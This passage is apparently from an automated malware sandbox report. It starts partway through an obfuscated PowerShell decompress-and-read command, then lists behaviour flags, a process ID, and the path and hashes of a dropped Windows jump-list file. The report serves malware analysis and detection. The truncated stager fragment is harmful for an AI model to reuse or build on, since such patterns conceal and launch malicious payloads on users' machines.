ode]::Decompress))).ReadToEnd()))4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2692
-
-
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5e2b34276e81369423d465477a6bcf511
SHA135a8a6e55aad69621450128b8228efe2f883f254
SHA256164230911069a14e298474c336d8cc47302a50a34474d89486b07d8b6444e944
SHA512e5c72a84f410df6001c967020ee32d3656c8cf121ab72625faa27742bd51d7aa9c99f8399728c9601b53a34d6b1b881814001f1964cc2312cb711de692bfe58f